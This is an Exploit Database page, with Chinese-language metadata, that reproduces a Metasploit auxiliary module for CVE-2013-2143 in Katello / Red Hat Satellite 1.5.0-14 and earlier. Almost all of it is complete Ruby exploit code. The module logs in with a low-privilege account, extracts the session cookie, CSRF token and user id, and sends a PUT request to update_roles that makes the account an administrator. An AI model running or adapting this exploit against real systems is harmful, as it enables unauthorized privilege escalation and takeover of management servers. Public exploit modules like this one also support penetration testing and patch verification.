Katello (RedHat Satellite) – users/update_roles Missing Authorisation (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2014-03-26
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/32515/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit4 < Msf::Auxiliary
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize
  super(
  'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
  'Description'=> %q{
  This module exploits a missing authorization vulnerability in the
  "update_roles" action of "users" controller of Katello and Red Hat Satellite
  (Katello 1.5.0-14 and earlier) by changing the specified account to an
  administrator account.
  },
  'Author' => 'Ramon de C Valle',
  'License'=> MSF_LICENSE,
  'References' =>
  [
  ['CVE', '2013-2143'],
  ['CWE', '862']
  ],
  'DisclosureDate' => 'Mar 24 2014'
  )
  
  register_options(
  [
  Opt::RPORT(443),
  OptBool.new('SSL', [true, 'Use SSL', true]),
  OptString.new('USERNAME', [true, 'Your username']),
  OptString.new('PASSWORD', [true, 'Your password']),
  OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
  ], self.class
  )
  end
  
  def run
  print_status("Logging into #{target_url}...")
  res = send_request_cgi(
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'user_session', 'new'),
  'vars_get' => {
  'username' => datastore['USERNAME'],
  'password' => datastore['PASSWORD']
  }
  )
  
  if res.nil?
  print_error('No response from remote host')
  return
  end
  
  if res.headers['Location'] =~ /user_session\/new$/
  print_error('Authentication failed')
  return
  else
  session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
  
  if session.nil?
  print_error('Failed to retrieve the current session')
  return
  end
  end
  
  print_status('Retrieving the CSRF token for this session...')
  res = send_request_cgi(
  'cookie' => "_katello_session=#{session}",
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'dashboard')
  )
  
  if res.nil?
  print_error('No response from remote host')
  return
  end
  
  if res.headers['Location'] =~ /user_session\/new$/
  print_error('Authentication failed')
  return
  else
  session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
  
  if session.nil?
  print_error('Failed to retrieve the current session')
  return
  end
  end
  
  if res.headers['Location'] =~ /user_session\/new$/
  print_error('Failed to retrieve the user id')
  return
  else
  csrf_token = $1 if res.body =~ /<meta[ ]+content="(\S*)"[ ]+name="csrf-token"[ ]*\/?>/i
  csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(\S*)"[ ]*\/?>/i if csrf_token.nil?
  
  if csrf_token.nil?
  print_error('Failed to retrieve the CSRF token')
  return
  end
  
  user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/
  
  if user.nil?
  print_error('Failed to retrieve the user id')
  return
  end
  end
  
  print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
  res = send_request_cgi(
  'cookie'=> "_katello_session=#{session}",
  'headers' => {
  'X-CSRF-Token' => csrf_token
  },
  'method'=> 'PUT',
  'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
  'vars_post' => {
  'user[role_ids][]' => '1'
  }
  )
  
  if res.nil?
  print_error('No response from remote host')
  return
  end
  
  if res.headers['X-Message-Type'] =~ /success$/
  print_good('User updated successfully')
  else
  print_error('Failed to update user')
  end
  end
  
  def target_url(*args)
  (ssl ? 'https' : 'http') +
  if rport.to_i == 80 || rport.to_i == 443
  "://#{vhost}"
  else
  "://#{vhost}:#{rport}"
  end + normalize_uri(target_uri.path, *args)
  end
  end